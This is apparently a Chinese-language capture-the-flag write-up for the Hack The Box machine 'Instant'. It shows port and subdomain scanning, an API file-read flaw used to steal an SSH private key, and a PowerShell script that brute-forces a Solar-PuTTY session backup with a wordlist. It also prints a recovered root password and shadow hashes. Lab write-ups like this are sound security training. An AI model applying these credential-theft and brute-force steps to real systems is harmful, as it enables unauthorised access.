基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.11.37
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-14 14:38 CST
Nmap scan report for 10.10.11.37
Host is up (0.080s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
|_  256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
80/tcp open  http    Apache httpd 2.4.58
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Did not follow redirect to http://instant.htb/
Service Info: Host: instant.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.69 seconds

80

需要加hosts:

1
10.10.11.37 instant.htb

一个数字货币相关的:

instant.apk

页面提供一个apk,下载下来反编译分析,可以发现硬编码的子域名APU访问以及token:

子域名扫描

需要合适的字典,常规字典里没有swagger api相关的:

(反编译apk文件也可以找到,res/xml/network_security_config.xml里)

1
2
3
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/n0kovo_subdomains.txt -u "http://instant.htb/" -H 'Host: FUZZ.instant.htb'  -fc 301

swagger-ui              [Status: 302, Size: 203, Words: 18, Lines: 6, Duration: 357ms]

swagger-ui

访问swagger-ui,获得apk中没有的API信息:

mywalletv1

添加hosts后根据apk中信息,测试访问api:

之后就是根据API文档访问其他API:

read log

read log api根据请求格式,很明显的LFI:

常规猜测私钥文件存在,读取私钥:

user flag

读取的私钥处理下格式,登录:

Solar-PuTTY

常规翻文件,发现一个备份的Solar-PuTTY相关文件:

1
scp -i shirohige_id_rsa shirohige@10.10.11.37:/opt/backups/Solar-PuTTY/sessions-backup.dat .

搜索也能发现相关解密工具:

解密需要密码,常规爆破,脚本运行成功不会自动停止,检查桌面是否生成SolarPutty_sessions_decrypted.txt文件即可:

(这里应该是跳了一步,解密密码可以从web应用的数据库中获取hash破解而来,/home/shirohige/projects/mywallet/Instant-Api/mywallet/instance/instant.db)

1
2
"Username": "root",
"Password": "12**24nzC!r0c%q12",

SolarPuttyBruteforce.ps1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Define the path to rockyou.txt and the executable
$rockyouPath = "C:\Users\miao\Desktop\SolarPuttyDecrypt_v1\rockyou.txt"
$decryptExePath = "C:\Users\miao\Desktop\SolarPuttyDecrypt_v1\SolarPuttyDecrypt.exe"
$sessionsFilePath = "C:\Users\miao\Desktop\SolarPuttyDecrypt_v1\sessions-backup.dat"

# Define the wrapper function
function Invoke-SolarPuttyBruteforce {
    Get-Content -Path $rockyouPath | ForEach-Object {
        $password = $_.Trim()
        try {
            # Run the decryption executable with the current password
            & $decryptExePath $sessionsFilePath $password
        }
        catch {
            Write-Output "Error: $_"
        }
    }
}

# Run the function
Invoke-SolarPuttyBruteforce

root flag

得到的就是root密码,切过去:

shadow

1
2
root:$y$j9T$kbk3gZheVl2NWS6Kg2bYA.$LxNokXrLQvRyfmzXJHiZgzH73o2.Dk6UMGHsyj/Er./:19945:0:99999:7:::
shirohige:$y$j9T$EIEFkB5maGHp2kSFVdu6Q/$7uwKO1Xx2qzjNyqWuNBADn6sCgguYDUX4wfsql9Geq4:19945:0:99999:7:::

参考资料